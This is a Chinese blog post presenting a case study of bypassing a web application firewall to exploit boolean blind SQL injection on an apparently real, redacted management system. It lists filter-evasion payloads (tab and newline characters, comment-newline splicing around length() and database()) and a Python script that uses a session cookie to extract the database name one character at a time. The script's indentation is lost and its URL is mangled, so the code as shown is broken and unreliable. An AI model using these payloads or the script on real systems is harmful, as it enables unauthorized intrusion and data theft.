您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何解析SQL的bypass案例分析,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。
一、測(cè)試發(fā)現(xiàn)一個(gè)布爾型注入點(diǎn),測(cè)試過(guò)程如下:
1、原始請(qǐng)求
3、輸入’or’1’like’2
4、初步判斷存在布爾型sql盲注,然后開(kāi)始判斷庫(kù)名長(zhǎng)度:
5、首先想到可能處理了空格,手工簡(jiǎn)單測(cè)試下:
6、發(fā)現(xiàn):
空格or(不攔截)
or空格(攔截)
or/**/(攔截)
or%09 %0a %0b %0c %0d(不攔截)
二、簡(jiǎn)單fuzz下字符:
1、or (偶數(shù)個(gè)~) 也可以bypass
2、奇數(shù)個(gè)~執(zhí)行失?。?/p>
3、進(jìn)一步獲取庫(kù)名長(zhǎng)度:
4、還是被攔截,猜測(cè)是處理了length()或database()函數(shù),簡(jiǎn)單嘗試下:
5、length()被處理掉了,fuzz一下:
6、利用注釋換行符組合如length%23%0a()即可繞過(guò):
7、這里還是報(bào)錯(cuò),簡(jiǎn)單測(cè)試了下,把空格鍵換一下即可解決:
8、繼續(xù)判斷庫(kù)名長(zhǎng)度:
9、database()也被處理掉了,同樣的方法可繞過(guò):
10、最終得出數(shù)據(jù)庫(kù)長(zhǎng)度為7,如下圖:
11、獲取庫(kù)名
12、substr未攔截,借助intruder跑一下:
注出第一個(gè)字符為l
三、寫(xiě)個(gè)腳本拖一下完整庫(kù)名:
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_-'
database = ''
for l in range(1,8):
for payload in payloads:
burp0_url = "https://xxxxxx.xxxxxxxx.com:443/dms.web/manage/rest/basedata/DutyRecord?sort=EMPLOYEE_NO&order=asc&limit=10&offset=0®isterDate=2020-08-19'or%09substr(database%23%0a(),{0},1)%3d'{1}'%09or'1'like'2&employeeNo=0222&onDutyTime=08%3A00&offDutyTime=17%3A00&usableWorkingHours=9.0&dms_table=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D&dmsFuncId=15100070&_=1597802235462".format(l,payload)
burp0_cookies = {"JSESSIONID": "ABCWB37FFE3DB54BD5705453E681E41F2", "selectDealerCode": "xxxx", "selectusername": "xxxx", "language": "zh_CN"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Connection": "close", "Referer": "https://xxxxxx.yxxxxuxuxo.xxm/dms.web/html/index.html"}
resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
if "2018-10-22" in resp.content:
database += payload
print '[*]success\t' + database
else:
print '[*]dumping......'
print '[*]current database is:\t' + database
借助regexp正則匹配也可以實(shí)現(xiàn),payload:
'%20or%0adatabase%23%0a()regexp'%5el'%09or%09'2'like'1
成功注出第一個(gè)字符:l,以此類(lèi)推。
關(guān)于如何解析SQL的bypass案例分析就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。